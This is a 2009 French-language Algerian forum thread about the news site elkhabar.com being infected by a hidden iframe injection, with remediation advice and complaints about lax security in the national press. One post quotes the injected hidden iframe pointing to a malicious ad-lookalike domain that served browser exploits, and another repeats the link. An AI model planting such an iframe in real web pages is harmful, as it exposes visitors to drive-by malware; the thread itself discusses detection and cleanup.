IL SEMBLE QUE VOUS UTILISEZ ADBLOC POUR BLOQUER LA PUBLICITÉ, AUCUNE PUB INTRUSIVE SUR FDZ ET PAS DE POPUP
FDZ EST GRATUIT DONC MERCI DE DÉSACTIVER VOTRE ADBLOCK ET DE BIEN VOULOIR PARTICIPER ET JOUER LE JEU


PAR SUITE D'ABUS LES SERVEURS CCCAM ET ABONNEMENT NE SONT PAS TOLÉRÉS SUR LE FORUM

Page 1 sur 2 12 DernièreDernière
Affichage des résultats 1 à 10 sur 18
Share |

Discussion: Le site elkhabar.com infecté par une injection de iframe

  1. #1
    Date d'inscription
    janvier 2008
    Messages
    1 405
    Remerciements
    23
    Remercié 128 fois dans 114 messages
    Pouvoir de réputation
    11

    Exclamation Le site elkhabar.com infecté par une injection de iframe

    Le site d'elkhabar l'es aussi, et cela depuis plus d'une semaine

    Cliquer ici pour agrandir

  2. #2
    Date d'inscription
    août 2008
    Localisation
    Alger
    Messages
    349
    Remerciements
    0
    Remercié 1 fois dans 1 message
    Pouvoir de réputation
    10

    Par défaut

    C'est même pas la peine de leur dire, ils veulent pas entendre.

    j'ai contacté il ya 3 mois le webmaster d'un journal arabophone, via son hebergeur, il me demande au téléphone ce qu'il doit faire ? mais ne veut pas que je me présente au bureau, comme je connais le manège en Algérie, je lui est donné la moitié de la solution et depuis.....black out.

    En ce qui concerne les autres journaux, je me suis déplacer en personne a la maison "du stress" de la presse, j'ai trouvé aucuns interlocuteur, j'ai laisser ma carte de visite, et j'ai bien préciser que je peut venir la nuit même pour régler le problème "GRATUITEMENT".
    puisque j'habite a 200 m.

    Depuis , aucuns appels.

    Ce qui m'a le plus mis mal a l'aise, c'est le ricanement des gens, ce sourire "mal placé" celui des ignares et content de l'être "MARGUINES".

    J'ai pitié pour eux , les pauvres.
    Dernière modification par ktalgerie ; 28/03/2009 à 14h11.

  3. #3
    Date d'inscription
    janvier 2008
    Messages
    1 779
    Remerciements
    2
    Remercié 23 fois dans 9 messages
    Pouvoir de réputation
    11

    Par défaut

    Salam,

    Dane le meme cas que le site d'EEPAD (voir discussion) le site d'elkhabar est infectée par une "hidden iframe injection"

    Code:
    <iframe src="http://goooogleadsence.biz/?click=2FF8951" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
    et voici une partie du rapport de google

    The last time Google visited this site was on 2009-03-19, and the last time suspicious content was found on this site was on 2009-03-18.Malicious software includes 30 scripting exploit(s).
    This site was hosted on 2 network(s) including AS16276 (OVH), AS10316 (ABACUS).
    Ce qu'il faderait faire dans ce genre de cas:

    • Il faut effectuer investigation pour connaitre la source du problème en analysant tous les logs (ftp, http, logs de connexion...), analyser les PCs des webmasters, demander l'aide de l'hébergeur si vous suspecter l'hébergement mutualisé, verfier les ads (pubs)
    • localiser toutes les iframes et les supprimer sur l'ensemble des pages du site (verifier aussi le contenu des BD)
    • Vérifier et attribuer les bons privilèges pour les répertoires, fichiers et BD (chmod, chown...)
    • Modifier les mots de passe FTP, SSH, interface WEB, panels... etc

    Qu'est ce qu'on pourrait faire aussi ?

  4. #4
    Date d'inscription
    août 2008
    Localisation
    Alger
    Messages
    349
    Remerciements
    0
    Remercié 1 fois dans 1 message
    Pouvoir de réputation
    10

    Par défaut

    assilabox, tu me fait rires.......
    y a akhi, il y a rien de ce que tu dis.
    le webmaster, t&#233;l&#233;charge sans piti&#233; des logiciels pirates et les essayant en live sur l'h&#233;bergement, il se connecte des fois m&#234;me a partir de cybercaf&#233;.
    JE TE DONNE MA PAROLE, il n y a aucun journal qui &#224;, ne serais ce un gramme de politique de s&#233;curisation. d'ailleurs les responsables ont peur de perdre leurs informaticiens si il bloquent la messagerie instantan&#233;e etc....
    le gars "entre 19-24 ans" est consid&#233;r&#233; comme dieu en personne par rapport &#224; la direction et il fait comme il veut, si il vous trouve comme concurrent directe pour son job de pseudo informaticien, il n a qu'a parler en douce au directeur et raconter n'importe quoi et vous serez personna no gratta le reste de votre vie, c'est ces petits jeunes "khoutou de 3eme classe" qui font la loi dans le cercle ferm&#233; de la presse alg&#233;rienne genre les gars qui te dit "chriki...pas de probl&#232;me" d'ailleurs en expliquant au jeune homme au t&#233;l&#233;phone, il fallait que je lui fasse un cours sur les ifram, il n'avait jamais entendus parler de &#231;a.........

    Il y a d'autres journaux, qui ont soliciter directement des soci&#233;t&#233;s d'outre mer, qui s'en foutent eprdument de leur patrimoine informationnelle, une anecdote et pour ne pas citer de journal, je me suis d&#233;plac&#233; en personne et laiss&#233; un message au charg&#233; du site, en lui &#233;crivant "stp, contacte la boite fran&#231;aise et dit leur d'appliquer le patch de spip, cela fais une semaine qu'il est disponible et votre journal est encore vuln&#233;rable" .

    Une question me trotte dans la t&#234;te, pourquoi je fais cela ????
    il ne m&#233;ritent pas..........

  5. #5
    Date d'inscription
    janvier 2008
    Messages
    1 779
    Remerciements
    2
    Remercié 23 fois dans 9 messages
    Pouvoir de réputation
    11

    Par défaut

    Salam,

    Cliquer ici pour agrandir Envoyé par ktalgerie Cliquer ici pour agrandir
    assilabox, tu me fait rires.......
    y a akhi, il y a rien de ce que tu dis.
    le webmaster, télécharge sans pitié des logiciels pirates et les essayant en live sur l'hébergement, il se connecte des fois même a partir de cybercafé.
    Effectivement mon ami, c'est pour ça que j'ai mis analyser les PCs des webmasters. Mais j'ai essayé d'analyser le problème dans un registre général...
    Cliquer ici pour agrandir Envoyé par ktalgerie Cliquer ici pour agrandir
    Il y a d'autres journaux, qui ont soliciter directement des sociétés d'outre mer, qui s'en foutent eprdument de leur patrimoine informationnelle...
    Tu parle de itmag et d'elwatan? A mon avis il y a aucun mal a citer les journaux, en esperant qu'un jour nos "billets" ne tombent pas dans les oreilles de sourds....


    Cliquer ici pour agrandir Envoyé par ktalgerie Cliquer ici pour agrandir
    Une question me trotte dans la tête, pourquoi je fais cela ????
    il ne méritent pas..........
    Si nous faisons ca c'est parce que notre conscience nous le dicte et que nous voulons amelioer les choses...

    [générique]
    note d'espoir
    [/générique]
    Dernière modification par assilabox ; 20/03/2009 à 12h57.

  6. #6
    Date d'inscription
    juillet 2008
    Messages
    262
    Remerciements
    0
    Remercié 0 fois dans 0 messages
    Pouvoir de réputation
    10

    Par défaut

    Sans parler de la faille qui est toujours pr&#233;sente depuis l'ann&#233;e derni&#232;re...

  7. #7
    Date d'inscription
    août 2008
    Localisation
    Alger
    Messages
    349
    Remerciements
    0
    Remercié 1 fois dans 1 message
    Pouvoir de réputation
    10

    Par défaut

    @assilabox: bien dit.
    @fromYou: hahahahahahaha, stp ma tafdahch.....et en plus y a un comité de la cyber criminalité zaamaa, j'allais assister à la première réunion, wallah, quand j'ai connus les noms des participants, j'ai fais demi tour , j'ai fermé mon mobile et j'ai emmener mes enfants au park de ben aknoun (les animaux du zoo khir menhoum).

  8. #8
    Date d'inscription
    novembre 2008
    Messages
    78
    Remerciements
    10
    Remercié 5 fois dans 5 messages
    Pouvoir de réputation
    10

    Par défaut

    Petit HS (je m'en excuse) : est il normal que mon antivirus n'ait rien detecté lorsque j'ai consulté la page en questionCliquer ici pour agrandir
    Je possede la derniere version de eset smart security. j'ai meme essayé avec KIS 8 meme chose !!!
    Merci

  9. #9
    Date d'inscription
    août 2008
    Localisation
    Alger
    Messages
    349
    Remerciements
    0
    Remercié 1 fois dans 1 message
    Pouvoir de réputation
    10

    Par défaut

    Non pas du tous , ce n'est pas HS,
    Installe avira free et c bon.
    pour l'instant c'est le meilleur.

  10. #10
    Date d'inscription
    avril 2008
    Messages
    1 348
    Remerciements
    0
    Remercié 0 fois dans 0 messages
    Pouvoir de réputation
    11

    Par défaut

    goooogleadsence.biz/?click=562C9B

    J'ai visit&#233; le lien, la page est vierge m&#234;me sa source ..

    A propos j'ai Noscript install&#233; sur Firefox normalement je risque pas grand chose Cliquer ici pour agrandir

Page 1 sur 2 12 DernièreDernière

Discussions similaires

  1. Le Site du Ministère des PTIC Infecté !
    Par ktalgerie dans le forum Actu - News High-Tech
    Réponses: 3
    Dernier message: 30/08/2009, 02h56
  2. [Réglé] Le site de la radio de constantine infecté
    Par assilabox dans le forum Sécurité Informatique
    Réponses: 1
    Dernier message: 24/04/2009, 08h58
  3. Le site assila.net (EEPAD) infecté par une injection de iframe
    Par assilabox dans le forum Sécurité Informatique
    Réponses: 12
    Dernier message: 20/03/2009, 06h56
  4. Le site d'ElKhabar
    Par ButterflyOfFire dans le forum Guesra
    Réponses: 17
    Dernier message: 12/07/2008, 08h27

Liens sociaux

Règles de messages

  • Vous ne pouvez pas créer de nouvelles discussions
  • Vous ne pouvez pas envoyer des réponses
  • Vous ne pouvez pas envoyer des pièces jointes
  • Vous ne pouvez pas modifier vos messages
  •  
[Auto utilitaire DZ] [Webimag] [Algérie Info] [Guide Algérie] [Mosquée ALBADR MEAUX] [Photographe MARIAGE]

is PageRank Checking Icon